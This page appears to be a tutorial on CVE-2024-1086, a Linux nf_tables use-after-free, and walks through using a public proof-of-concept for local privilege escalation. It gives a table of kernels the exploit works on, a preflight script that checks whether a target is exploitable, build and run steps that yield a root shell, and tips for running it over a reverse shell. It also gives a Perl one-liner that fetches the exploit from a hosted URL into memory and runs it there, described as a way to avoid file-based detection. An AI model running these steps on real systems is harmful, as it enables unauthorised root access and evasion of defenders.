Linux Local Privilege Escalation Vuln. Explained
How the CVE-2024-1086 vulnerability works.
CVE-2024-1086 is a use-after-free in the Linux kernel's netfilter nf_tables subsystem: nft_verdict_init() accepted positive values as the drop error of an NF_DROP verdict, so nf_hook_slow() could treat the drop as an accept and free the socket buffer twice. Notselwyn's proof-of-concept turns this bug into a universal local privilege escalation that works on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu and KernelCTF images, with a reported success rate of 99.4% on KernelCTF images. The fix was backported to the stable kernel series in early 2024, so a kernel inside that version window is only affected if the distribution has not yet shipped the patched release; check the distro changelog rather than the bare version number.
Kernel Versions Tested
Kernel Version | Distro | Distro Version | Status |
---|---|---|---|
v5.14.21 | n/a | n/a | working |
v5.15.148 | n/a | n/a | working |
v5.16.20 | n/a | n/a | working |
v5.17.15 | n/a | n/a | working |
v5.18.19 | n/a | n/a | working |
v5.19.17 | n/a | n/a | working |
v6.0.19 | n/a | n/a | working |
v6.1.55 | KernelCTF | Mitigation v3 | working |
v6.1.69 | Debian | Bookworm 6.1.0-17 | working |
v6.1.72 | KernelCTF | LTS | working |
v6.2.? | Ubuntu | Jammy v6.2.0-37 | working |
v6.2.16 | n/a | n/a | working |
v6.3.13 | n/a | n/a | working |
Usage
Configuration
The default values should work on Debian, Ubuntu, and KernelCTF from a local shell. On distros that have not been tested, make sure the kernel configuration macros defined in src/config.h match the target kernel. If you are running the PoC on a machine with more than 32 GiB of RAM, increase CONFIG_PHYS_MEM accordingly, otherwise the spray will not cover physical memory.
If you are running the exploit over SSH (into the test machine) or through a reverse shell, set CONFIG_REDIRECT_LOG to 1 to avoid flooding the connection with log output.
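The checks the paragraphs above ask you to make by hand, as an added preflight script (this is example code written for this page, not a script from Notselwyn's repository). It assumes a Linux target with /proc mounted; the kconfig symbols and sysctls it reads are the kernel's own, the 5.14..6.6 window and the 32 GiB threshold are the ones stated above, and the report/wording is this page's.

```shell
#!/bin/sh
# Preflight check for the CVE-2024-1086 PoC (added example, not part of the
# repository). Verifies the assumptions the Configuration section makes before
# ./exploit is run: kernel version inside the 5.14..6.6 window, nf_tables built,
# unprivileged user namespaces reachable (the PoC needs them to talk to
# nf_tables without CAP_NET_ADMIN), and whether RAM exceeds 32 GiB, in which
# case CONFIG_PHYS_MEM in src/config.h has to be raised.

# kernel_in_range VERSION -> success when 5.14 <= MAJOR.MINOR <= 6.6.
# Accepts "uname -r" output such as 6.1.0-17-amd64 (only MAJOR.MINOR matter).
kernel_in_range() {
    major=$(printf '%s' "$1" | cut -d. -f1)
    minor=$(printf '%s' "$1" | cut -s -d. -f2)
    case "$major" in ''|*[!0-9]*) return 1 ;; esac
    case "$minor" in ''|*[!0-9]*) return 1 ;; esac
    if [ "$major" -eq 5 ] && [ "$minor" -ge 14 ]; then return 0; fi
    if [ "$major" -eq 6 ] && [ "$minor" -le 6 ]; then return 0; fi
    return 1
}

# needs_phys_mem_bump MEMINFO_TEXT -> success when MemTotal exceeds 32 GiB,
# i.e. when CONFIG_PHYS_MEM in src/config.h must be increased.
needs_phys_mem_bump() {
    kb=$(printf '%s\n' "$1" | awk '/^MemTotal:/ { print $2; exit }')
    [ -n "$kb" ] && [ "$kb" -gt $((32 * 1024 * 1024)) ]
}

# kconfig_value SYMBOL -> prints the symbol's value from the running kernel's
# config (/proc/config.gz or /boot/config-$(uname -r)); prints nothing if the
# config is not readable.
kconfig_value() {
    if [ -r /proc/config.gz ]; then
        zcat /proc/config.gz | sed -n "s/^$1=//p"
    elif [ -r "/boot/config-$(uname -r)" ]; then
        sed -n "s/^$1=//p" "/boot/config-$(uname -r)"
    fi
}

# userns_reachable -> success when the current (unprivileged) user can create
# a user namespace. The sysctl is a Debian/Ubuntu knob; mainline kernels lack it.
userns_reachable() {
    if [ -r /proc/sys/kernel/unprivileged_userns_clone ]; then
        [ "$(cat /proc/sys/kernel/unprivileged_userns_clone)" = "1" ] || return 1
    fi
    command -v unshare >/dev/null 2>&1 && unshare -Ur true 2>/dev/null
}

report() { printf '%-5s %s\n' "$1" "$2"; }

main() {
    ver=$(uname -r)
    if kernel_in_range "$ver"; then report ok "kernel $ver is inside the 5.14..6.6 window"
    else report FAIL "kernel $ver is outside the window the PoC targets"; fi

    if [ -r /proc/meminfo ] && needs_phys_mem_bump "$(cat /proc/meminfo)"; then
        report WARN "more than 32 GiB of RAM: raise CONFIG_PHYS_MEM in src/config.h"
    else
        report ok "RAM is within the default CONFIG_PHYS_MEM assumption"
    fi

    nft=$(kconfig_value CONFIG_NF_TABLES)
    case "$nft" in
        y|m) report ok "CONFIG_NF_TABLES=$nft" ;;
        '')  report WARN "kernel config not readable; cannot confirm CONFIG_NF_TABLES" ;;
        *)   report FAIL "CONFIG_NF_TABLES=$nft; nf_tables is not available" ;;
    esac

    if userns_reachable; then report ok "unprivileged user namespaces are available"
    else report FAIL "unprivileged user namespaces are blocked; nf_tables is unreachable"; fi

    if [ -n "${SSH_CONNECTION:-}" ]; then
        report WARN "running over SSH: set CONFIG_REDIRECT_LOG to 1 in src/config.h"
    fi
}

main "$@"
```

Run it on the target from the same unprivileged shell you intend to launch ./exploit from; a FAIL on the user-namespace line means the PoC cannot reach nf_tables no matter what the kernel version is, and a WARN on RAM or SSH points at the src/config.h value to change before building.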
Building
If building is impractical for you, Notselwyn also provides a precompiled x86-64 binary built with the default config in the repository.
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
Running
Once built, run the PoC from an unprivileged local shell; on success it drops you into a root shell:
./exploit
The binary can also be executed straight from memory (a fileless run) when writing it to disk would trip file-based detection. Perl must be installed on the target: the snippet creates an anonymous memfd, streams the binary into it over HTTPS, and executes it through /proc/<pid>/fd. Replace the example.com URL with wherever you host the binary:
perl -e '
require "syscall.ph";                                # provides SYS_memfd_create(); generated by h2ph
my $name = "memfd";                                  # label shown in /proc/<pid>/fd, not a path on disk
my $fd = syscall(SYS_memfd_create(), $name, 0);      # anonymous in-memory file, inherited by children
die "memfd_create failed: $!" if $fd < 0;
system "curl https://example.com/exploit -s >&$fd";  # stream the binary straight into the memfd
exec {"/proc/$$/fd/$fd"} "memfd";                    # execute it without touching the filesystem
'
Special Thanks
This tutorial was written largely with the help of the PoC's author, Notselwyn; the PoC itself is at https://github.com/Notselwyn/CVE-2024-1086. Thank you!